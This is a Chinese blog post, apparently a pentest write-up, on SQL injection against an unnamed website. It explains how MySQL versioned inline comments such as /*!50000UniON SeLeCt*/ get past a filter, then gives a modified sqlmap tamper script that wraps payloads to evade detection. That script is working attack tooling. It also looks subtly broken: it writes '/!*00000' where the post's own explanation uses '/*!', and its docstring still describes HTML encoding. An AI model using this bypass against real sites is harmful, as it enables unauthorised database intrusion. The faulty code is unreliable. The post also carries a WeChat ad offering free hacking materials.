在一次渗透中学会编写Tamper脚本

2024-06-01 407 0

拿到这个网站,通过对比查询,我们发现

在一次渗透中学会编写Tamper脚本插图

闭合参数 finsh 时,查询出的内容更多

在一次渗透中学会编写Tamper脚本插图1

经过进一步判断,确实存在漏洞

在一次渗透中学会编写Tamper脚本插图2

在一次渗透中学会编写Tamper脚本插图3

不过在测试的时候发现存在一定的过滤

在一次渗透中学会编写Tamper脚本插图4

但是可以通过内联注释进行绕过。

这里也是加深了解了内联注释的知识点,之前只会简单的利用 /*!50000UniON SeLeCt*//*!12345union*/不知其所以然,有这样一段解释,在 mysql 中 /*!...*/不是注释,mysql 为了保持兼容,它把一些特有的仅在 mysql 上用的语句放在 /*!...*/中,这样这些语句如果在其他数据库中是不会被执行,但是在 mysql 中它会执行。当后面接的数据库版本号小于自身版本号,就会将注释中的内容执行,当后面接的数据库版本号大于等于自身版本号,就会当做注释来处理。如下语句 /*!50001UniON SeLeCt*/这里的 50001 表示假如数据库的版本是 5.00.01 及其以上版本才会被使用。这里我们会产生一个疑问,数据库的版本也不仅仅是五位数字,也存在四位,甚至于三位,应该是会进行处理 5.7.23 也对应着 5.07.23

在一次渗透中学会编写Tamper脚本插图5

我们首先查询出数据库的版本信息

【----帮助网安学习,以下所有学习资料免费领!加vx:dctintin,备注“freebuf”获取!】

① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

在一次渗透中学会编写Tamper脚本插图6

当前面的数字为 50723 及小于这个数的五位数字组合都可以利用成功

在一次渗透中学会编写Tamper脚本插图7

当前面的数字为 50724 及大于这个数的五位数字组合无法利用成功

在一次渗透中学会编写Tamper脚本插图8

我们已经手工验证过了存在 SQL 注入漏洞,但是却无法利用 sqlmap 识别出联合注入,是因为存在检测,需要内联注释进行绕过

在一次渗透中学会编写Tamper脚本插图9

我们需要编写一个Tamper脚本

在一次渗透中学会编写Tamper脚本插图10

我们打开 sqlmap-master\tamper 下的一个文件 htmlencode.py 我们看到就是一个查找替换的操作

我们目前已经知道需要利用内联注释来实现绕过检测的操作

在一次渗透中学会编写Tamper脚本插图11

我们修改代码

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
 pass

def tamper(payload, **kwargs):
 """
HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> &amp#39;)

>>> tamper("1' AND SLEEP(5)#")
'1'/!*00000AND SLEEP(5)*/#'
"""
 if payload:
     replaced_text = payload
     replace_code = re.search(r"'(.*?)(#|--)", payload)
     if replace_code:
          replaced_text = re.sub(r"(?<=')(.*?)(?=#|--)", r"/!*00000\1*/", payload)

 return replaced_text

成功生效

在一次渗透中学会编写Tamper脚本插图12


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

办事处网络安全监控与事件响应;国外员工终端安全性怎么保障 | FB甲方群话题讨论
拿不下总统之位,那就用热加载拿下验证码识别与爆破好了!
Sooty:一款SoC分析一体化与自动化CLI工具
shiro CVE-2016-6802 路径绕过(越权)
Apache Solr 身份验证绕过漏洞(CVE-2024-45216)详解
llama_index的CVE-2024-4181漏洞根因分析

发布评论